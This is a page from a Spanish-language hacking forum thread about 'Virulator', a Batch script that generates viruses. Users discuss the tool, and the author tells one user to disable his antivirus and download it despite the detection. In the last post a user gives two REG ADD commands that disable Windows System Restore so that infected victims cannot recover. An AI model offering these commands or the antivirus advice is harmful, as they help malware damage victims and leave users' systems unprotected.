elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: ¿Eres nuevo? ¿Tienes dudas acerca del funcionamiento de la comunidad? Lee las Reglas Generales


+  Foro de elhacker.net
|-+  Programación
| |-+  Scripting
| | |-+  [Batch] Virulator 1.0c
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: 1 2 [3] 4 Ir Abajo Respuesta Imprimir
Autor Tema: [Batch] Virulator 1.0c  (Leído 24,231 veces)
Eleкtro
Ex-Staff
*
Desconectado Desconectado

Mensajes: 9.817



Ver Perfil
Re: [Batch] Virulator 1.0c
« Respuesta #20 en: 31 Julio 2012, 00:00 am »

Dios mio pedazo curro xD, pero en las imágenes las tildes no se te ven, eso lo has corregido? porque a mi me pasaba y aqui encontré como :D
http://foro.elhacker.net/scripting/caracteres_especiales_en_batch_espero_les_sirva-t270247.0.html
No te preocupes, Es algo que se me pasó (únicamente) al tomar las capturas. (No quise volverlas a hacer, Soy un vago xD).

Y tengo unas dudas que me gustaría consultar contigo que se ve que sabes mucho, podríamos tratarlas por mensajes privados?
Si son dudas puntuales no hay problema, Si son dudas más profundizadas quizás te convendría crear un topic con todas tús preguntas para que te podamos ayudar entre todos, Y de paso les sirva al resto de usuarios.

Salu2.


En línea

Danirs

Desconectado Desconectado

Mensajes: 71



Ver Perfil
Re: [Batch] Virulator 1.0c
« Respuesta #21 en: 31 Julio 2012, 02:48 am »

Buenas!

Al intentar descargarme el script de la pagina me sale que hay un troyano y me bloquea la pagina... :huh: :huh: que puede ser?


En línea

Qué es la vida un frenesí. Qué es la vida una ilusión, una sombra, una ficción. Que todo en la vida es sueño y los sueños, sueños son.
Eleкtro
Ex-Staff
*
Desconectado Desconectado

Mensajes: 9.817



Ver Perfil
Re: [Batch] Virulator 1.0c
« Respuesta #22 en: 31 Julio 2012, 03:14 am »

Al intentar descargarme el script de la pagina me sale que hay un troyano y me bloquea la pagina... :huh: :huh: que puede ser?
El script es detectado como virus por algunos AV's (Seguramente por los códigos VisualBasicScript que usa), Pero es un falso positivo, Virulator es una herramienta para crear "virus", Pero no es ninguna amenaza de infección de virus. Desactiva el AV que uses y déscarga el script si deseas.

Aquí tienes más info:

Saludos.
En línea

Danirs

Desconectado Desconectado

Mensajes: 71



Ver Perfil
Re: [Batch] Virulator 1.0c
« Respuesta #23 en: 31 Julio 2012, 12:05 pm »

Gracias efectivamente era eso que tu decias.
Desactivo y ya esta.
En línea

Qué es la vida un frenesí. Qué es la vida una ilusión, una sombra, una ficción. Que todo en la vida es sueño y los sueños, sueños son.
dato000


Desconectado Desconectado

Mensajes: 3.034



Ver Perfil
Re: [Batch] Virulator 1.0c
« Respuesta #24 en: 25 Agosto 2012, 01:04 am »

Viejo, esto en palabras de un n00b como yo, es MAGIA!!!!

gracias por ser tan genial sensei

En línea


m0rf


Desconectado Desconectado

Mensajes: 828


BACK!


Ver Perfil
Re: [Batch] Virulator 1.0c
« Respuesta #25 en: 2 Septiembre 2012, 13:39 pm »

El script es detectado como virus por algunos AV's (Seguramente por los códigos VisualBasicScript que usa), Pero es un falso positivo, Virulator es una herramienta para crear "virus", Pero no es ninguna amenaza de infección de virus. Desactiva el AV que uses y déscarga el script si deseas.

Aquí tienes más info:
Saludos.

El proyecto no esta abandonado, espero sacar la primera versión antes de final de año.

La cosa es que me motivé mucho y empece a seleccionar más lenguajes de script para ofuscar xDD

Ya os contaré...
En línea

Si todos fuéramos igual de inteligentes no existiría la mediocridad porque no podríamos apreciarla. Aprecias la mediocridad?
Ahorsa

Desconectado Desconectado

Mensajes: 15


Ver Perfil
Re: [Batch] Virulator 1.0c
« Respuesta #26 en: 6 Octubre 2012, 21:59 pm »



:P
En línea

тαптяα


Desconectado Desconectado

Mensajes: 1.151


Sic utere tuo ut alienum non laeda


Ver Perfil WWW
Re: [Batch] Virulator 1.0c
« Respuesta #27 en: 6 Octubre 2012, 22:04 pm »

https://www.google.es/webhp?sourceid=chrome-instant&ie=UTF-8&ion=1#hl=es&safe=off&pwst=1&sa=X&ei=X45wUM_VBYGLhQeWmYGYCQ&spell=1&q=generator+virus+p43l0&ved=0CB4QvwUoAA&bav=on.2,or.r_gc.r_pw.r_cp.r_qf.&fp=f441e70d8610e415&biw=1680&bih=925&ion=1

El primer resultado igual te ayuda, en alguna cosa que le puede faltar a un virus generator.

Saludos
En línea

AdeLax

Desconectado Desconectado

Mensajes: 63



Ver Perfil WWW
Re: [Batch] Virulator 1.0c
« Respuesta #28 en: 10 Octubre 2012, 19:54 pm »

Yo tengo un problema cuando lo ejecuto me sale este mensaje No se encuentra el archivo de comandos c:\....invisible.vbs y en la consola aparece "El sistema no puede encontrar la ruta especificada

Alguna solucion ??
En línea

scalverth

Desconectado Desconectado

Mensajes: 21


Ver Perfil
Re: [Batch] Virulator 1.0c
« Respuesta #29 en: 11 Octubre 2012, 03:02 am »

Quiero dar una idea, agregar la opción de des-habilitar restaurar sistema, la mayoría de los usuarios cuando entran en pánico por virus intentan usar esta herramienta, linda sorpresa les espera.  :xD

Código:
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_SZ /d 1 /F
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_SZ /d 1 /F
Saludos.
En línea

Páginas: 1 2 [3] 4 Ir Arriba Respuesta Imprimir 

Ir a:  

WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines